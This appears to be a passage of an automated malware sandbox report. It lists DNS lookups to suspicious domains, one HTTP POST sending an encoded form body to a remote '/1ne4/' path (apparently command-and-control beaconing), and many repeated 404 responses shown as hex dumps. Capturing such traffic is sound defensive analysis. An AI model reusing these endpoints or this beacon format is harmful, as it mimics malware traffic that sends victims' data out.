                Source: global trafficDNS traffic detected: DNS query: www.graviton.energy
                Source: global trafficDNS traffic detected: DNS query: www.ausyva4.top
                Source: global trafficDNS traffic detected: DNS query: www.e8af.xyz
                Source: unknownHTTP traffic detected: POST /1ne4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.elinor.clubOrigin: http://www.elinor.clubContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 194Cache-Control: no-cacheReferer: http://www.elinor.club/1ne4/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36Data Raw: 72 46 62 64 79 3d 61 6b 33 62 41 61 73 75 7a 51 54 78 45 6c 6f 4e 72 75 42 61 4e 34 45 4c 5a 66 67 7a 54 37 64 35 67 46 39 47 31 79 49 51 38 65 5a 49 43 4b 58 41 76 68 61 4e 31 44 4d 56 4c 65 35 57 4b 56 51 56 49 49 6f 63 5a 53 4e 57 30 56 41 76 72 32 2b 6e 35 6a 6c 70 78 42 5a 72 6e 71 2b 77 2b 54 4c 6c 31 45 43 79 4a 4b 57 5a 2b 35 30 49 47 43 61 72 58 45 39 44 37 36 37 45 4d 55 37 47 52 58 32 74 42 33 48 6b 4b 51 55 50 65 48 45 64 49 38 43 57 6b 56 4e 63 37 4d 4e 77 70 73 5a 49 45 45 49 58 4f 74 62 35 52 52 67 42 45 50 47 6d 65 42 42 4b 57 66 35 4a 74 6a 58 53 4a 72 77 4d Data Ascii: rFbdy=ak3bAasuzQTxEloNruBaN4ELZfgzT7d5gF9G1yIQ8eZICKXAvhaN1DMVLe5WKVQVIIocZSNW0VAvr2+n5jlpxBZrnq+w+TLl1ECyJKWZ+50IGCarXE9D767EMU7GRX2tB3HkKQUPeHEdI8CWkVNc7MNwpsZIEEIXOtb5RRgBEPGmeBBKWf5JtjXSJrwM
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:43:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BT9j5wwI%2FnJbbeybh1Tzn7pNMs0Ulef8TNyLEgKtg2pmK3VpUv7RZ0ehe1Bt0oLSAyaCIcPhKJlSLvqRKmMN4%2BZOdVPgKuK%2Fik%2BuvAJaemgVZ71hJ1qGAzWAL0wa0w03"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90023eedbe44430f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c Data Ascii: 228<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendl
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: kangle/3.5Date: Sat, 11 Jan 2025 04:32:03 GMTSet-Cookie: home_lang=cn; path=/Content-Type: text/html; charset=utf-8X-Cache: MISS from kangle web serverTransfer-Encoding: chunkedConnection: closeData Raw: 62 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 e9 a1 b5 e9 9d a2 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2e 63 6f 6e 63 65 6e 74 65 72 2d 65 72 72 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 70 75 62 6c 69 63 2f 73 74 61 74 69 63 2f 65 72 72 70 61 67 65 2f 65 72 72 6f 72 5f 70 69 63 2e 70 6e 67 29 3b 7d 0d 0a 23 77 61 72 70 70 65 72 20 7b 77 69 64 74 68 3a 20 31 32 32 30 70 78 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 e5 be ae e8 bd af e9 9b 85 e9 bb 91 22 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 20 7b 7a 6f 6f 6d 3a 20 31 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 2c 20 2e 63 6c 65 61 72 66 69 78 3a 62 65 66 6f 72 65 20 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 68 65 69 67 68 74 3a 20 30 3b 63 6f 6e 74 65 6e 74 3a 20 27 5c 30 30 32 30 27 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 69 63 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 70 75 62 6c 69 63 2f 73 74 61 74 69 63 2f 65 72 72 70 61 67 65 2f 34 30 34 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 7b 77 69 64 74 68 3a 20 36 35 38 70 78 3b 68 65 69 67 68 74 3a 20 36 34 31 70 78 3b 6d 61 72 67 69 6e 3a 20 34 34 70 78 20 61 75 74 6f 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 6d 62 33 37 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 37 70 78 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74 20 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 39 31 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 39 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 5c 35 46 41 45 5c 38 46 36 46 5c 39 36 43 35 5c 39 45 44 31 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: kangle/3.5Date: Sat, 11 Jan 2025 04:32:06 GMTSet-Cookie: home_lang=cn; path=/Content-Type: text/html; charset=utf-8X-Cache: MISS from kangle web serverTransfer-Encoding: chunkedConnection: closeData Raw: 62 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 e9 a1 b5 e9 9d a2 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2e 63 6f 6e 63 65 6e 74 65 72 2d 65 72 72 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 70 75 62 6c 69 63 2f 73 74 61 74 69 63 2f 65 72 72 70 61 67 65 2f 65 72 72 6f 72 5f 70 69 63 2e 70 6e 67 29 3b 7d 0d 0a 23 77 61 72 70 70 65 72 20 7b 77 69 64 74 68 3a 20 31 32 32 30 70 78 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 e5 be ae e8 bd af e9 9b 85 e9 bb 91 22 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 20 7b 7a 6f 6f 6d 3a 20 31 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 2c 20 2e 63 6c 65 61 72 66 69 78 3a 62 65 66 6f 72 65 20 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 68 65 69 67 68 74 3a 20 30 3b 63 6f 6e 74 65 6e 74 3a 20 27 5c 30 30 32 30 27 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 69 63 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 70 75 62 6c 69 63 2f 73 74 61 74 69 63 2f 65 72 72 70 61 67 65 2f 34 30 34 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 7b 77 69 64 74 68 3a 20 36 35 38 70 78 3b 68 65 69 67 68 74 3a 20 36 34 31 70 78 3b 6d 61 72 67 69 6e 3a 20 34 34 70 78 20 61 75 74 6f 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 6d 62 33 37 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 37 70 78 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74 20 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 39 31 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 39 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 5c 35 46 41 45 5c 38 46 36 46 5c 39 36 43 35 5c 39 45 44 31 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: kangle/3.5Date: Sat, 11 Jan 2025 04:32:08 GMTSet-Cookie: home_lang=cn; path=/Content-Type: text/html; charset=utf-8X-Cache: MISS from kangle web serverTransfer-Encoding: chunkedConnection: closeData Raw: 62 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 e9 a1 b5 e9 9d a2 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2e 63 6f 6e 63 65 6e 74 65 72 2d 65 72 72 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 70 75 62 6c 69 63 2f 73 74 61 74 69 63 2f 65 72 72 70 61 67 65 2f 65 72 72 6f 72 5f 70 69 63 2e 70 6e 67 29 3b 7d 0d 0a 23 77 61 72 70 70 65 72 20 7b 77 69 64 74 68 3a 20 31 32 32 30 70 78 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 e5 be ae e8 bd af e9 9b 85 e9 bb 91 22 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 20 7b 7a 6f 6f 6d 3a 20 31 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 2c 20 2e 63 6c 65 61 72 66 69 78 3a 62 65 66 6f 72 65 20 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 68 65 69 67 68 74 3a 20 30 3b 63 6f 6e 74 65 6e 74 3a 20 27 5c 30 30 32 30 27 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 69 63 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 70 75 62 6c 69 63 2f 73 74 61 74 69 63 2f 65 72 72 70 61 67 65 2f 34 30 34 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 7b 77 69 64 74 68 3a 20 36 35 38 70 78 3b 68 65 69 67 68 74 3a 20 36 34 31 70 78 3b 6d 61 72 67 69 6e 3a 20 34 34 70 78 20 61 75 74 6f 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 6d 62 33 37 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 37 70 78 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74 20 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 39 31 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 39 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 5c 35 46 41 45 5c 38 46 36 46 5c 39 36 43 35 5c 39 45 44 31 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: kangle/3.5Date: Sat, 11 Jan 2025 04:32:11 GMTSet-Cookie: home_lang=cn; path=/Content-Type: text/html; charset=utf-8X-Cache: MISS from kangle web serverTransfer-Encoding: chunkedConnection: closeData Raw: 62 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 e9 a1 b5 e9 9d a2 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2e 63 6f 6e 63 65 6e 74 65 72 2d 65 72 72 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 70 75 62 6c 69 63 2f 73 74 61 74 69 63 2f 65 72 72 70 61 67 65 2f 65 72 72 6f 72 5f 70 69 63 2e 70 6e 67 29 3b 7d 0d 0a 23 77 61 72 70 70 65 72 20 7b 77 69 64 74 68 3a 20 31 32 32 30 70 78 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 e5 be ae e8 bd af e9 9b 85 e9 bb 91 22 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 20 7b 7a 6f 6f 6d 3a 20 31 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 2c 20 2e 63 6c 65 61 72 66 69 78 3a 62 65 66 6f 72 65 20 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 68 65 69 67 68 74 3a 20 30 3b 63 6f 6e 74 65 6e 74 3a 20 27 5c 30 30 32 30 27 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 69 63 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 70 75 62 6c 69 63 2f 73 74 61 74 69 63 2f 65 72 72 70 61 67 65 2f 34 30 34 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 7b 77 69 64 74 68 3a 20 36 35 38 70 78 3b 68 65 69 67 68 74 3a 20 36 34 31 70 78 3b 6d 61 72 67 69 6e 3a 20 34 34 70 78 20 61 75 74 6f 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 6d 62 33 37 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 37 70 78 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74 20 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 39 31 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 39 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 5c 35 46 41 45 5c 38 46 36 46 5c 39 36 43 35 5c 39 45 44 31 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:44:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:44:34 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:44:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 